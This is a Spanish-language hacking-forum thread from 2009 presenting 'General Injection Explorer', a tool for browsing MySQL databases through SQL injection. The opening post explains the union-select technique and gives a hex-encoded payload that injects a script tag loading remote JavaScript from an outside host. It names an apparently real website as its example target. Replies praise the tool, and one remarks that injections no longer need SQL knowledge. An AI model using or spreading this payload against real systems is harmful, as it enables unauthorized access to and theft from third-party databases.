Foro de elhacker.NET

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

MySQLi | General Inejction Explorer | By PonyMagic

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2

Autor

Tema: MySQLi | General Inejction Explorer | By PonyMagic (Leído 7,063 veces)

Pony-Magic

Desconectado

Mensajes: 36

MySQLi | General Inejction Explorer | By PonyMagic

« en: 13 Diciembre 2009, 00:28 am »

General Injection Explorer 3.0
by PonyMagic

[?] Que es?
Basicamente es un explorador de bases de datos MySQL via SQLi, "incrustado" en la inyeccion.

[!] Que tiene la version 3.0?

Codeado desde 0.
Bypasseo de "illegal operation", y limite de group_concat_max_len.
Mejor manejo de CSS && DIVS.
Peticiones realizadas con AJAX.
Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] Como se usa?
En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.

Código:

(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Ejemplo:
adegasgalegas.es SQLi
adegasgalegas.es GIE SQLi

Injeccion con General Injection Explorer 3.0

Luego, se navegan las bases de datos, usando ese "cuadradito" como un mini-phpmyadmin

como se ve en el siguiente [.gif]:

Gracias a virtux por hostear, acá tienen el código y el link:
Link JS
Link Paste2 [Highlight]


	En línea

WHK

Moderador Global

Desconectado

Mensajes: 6.605

Sin conocimiento no hay espíritu

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #1 en: 13 Diciembre 2009, 03:28 am »

Está super bueno, me gustó me gustó me gustó

PD:
Donde dice:

Código

document.write("
 background: url(
  'http://www.diosdelared.com/blogs/themes/blackcyan/imagenes/bg.jpg'
 ) #000;z-index:1002;overflow: auto;}
"); // background

Podrías apuntar hacia otra web? xD ya que cuando se incluya esa imagen la referencia de la inyección se enviará a su web dejando en su log de acceso las inyecciones que alguien podría encontrar y utilizar con este script.

A mi me gustaría mucho si pudieras reemplazar el buffer de las imagenes con string en base64 y data/*; o simplemente hacerlo sin imagenes y evitar la dependencia de inclusiones externas.


« Última modificación: 13 Diciembre 2009, 03:33 am por WHK »	En línea

- https://yhojann.cl/ - https://whk.cl/

Pony-Magic

Desconectado

Mensajes: 36

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #2 en: 13 Diciembre 2009, 04:23 am »

gracias por el dato, lo voy a tener en cuenta!
si alguien tiene alguna critica "constructiva" o no

por favor que comente, asi la proxima queda mejor


	En línea

braulio--

Wiki

Desconectado

Mensajes: 896

Imagen recursiva

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #3 en: 13 Diciembre 2009, 14:58 pm »

Es la mejor herramienta para estas labores que he visto.
Tuviste una idea impresionante ;-)


	En línea

Crea tus propios códigos QR!

xassiz_

Desconectado

Mensajes: 273

Ich werde dich töten..

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #4 en: 13 Diciembre 2009, 16:37 pm »

Increíble


	En línea

YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE

fede_cp

Desconectado

Mensajes: 527

"porque pensar nunca fue entender"

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #5 en: 13 Diciembre 2009, 18:07 pm »

sisi!, esta muy buena, genial.

segui así

saludos


	En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

Banti

Desconectado

Mensajes: 225

NULL

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #6 en: 13 Diciembre 2009, 23:31 pm »

Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones

@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?


	En línea

YST

Desconectado

Mensajes: 965

I'm you

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #7 en: 14 Diciembre 2009, 02:37 am »

Cita de: Vaati en 13 Diciembre 2009, 23:31 pm

Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones

@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?

cifra la imagen en base64 y se la pasa al firefox pàra que la muestre

Sin necesidad de sacarla de alguna web


	En línea

Yo le enseñe a Kayser a usar objetos en ASM

kamsky

Colaborador

Desconectado

Mensajes: 2.218

Como no sabían que era imposible, lo hicieron...

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #8 en: 14 Diciembre 2009, 11:21 am »

Citar

cifra la imagen en base64

Más que cifrar, codificar


	En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

hack 4 free!!

YST

Desconectado

Mensajes: 965

I'm you

Re: MySQLi | General Inejction Explorer | By PonyMagic

« Respuesta #9 en: 14 Diciembre 2009, 20:14 pm »

Cita de: kamsky en 14 Diciembre 2009, 11:21 am

Citar

cifra la imagen en base64

Más que cifrar, codificar

Toda la razón kamsky


	En línea

Yo le enseñe a Kayser a usar objetos en ASM

Páginas: [1] 2

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	mysqli Desarrollo Web	tecasoft	2	2,459	24 Noviembre 2012, 20:47 pm por tecasoft
	¿Crear vistas temporales en php+mysqli ? PHP	Psyke1	0	1,836	21 Febrero 2013, 22:02 pm por Psyke1
	API MySQLi PHP	:ohk<any>	0	2,172	12 Noviembre 2013, 21:22 pm por :ohk<any>
	Error en PHP+MySqli PHP	spysecurityca	6	3,220	7 Mayo 2014, 04:52 am por spysecurityca
	mysqli error Bases de Datos	jalbtercero	1	2,620	6 Marzo 2016, 00:52 am por jalbtercero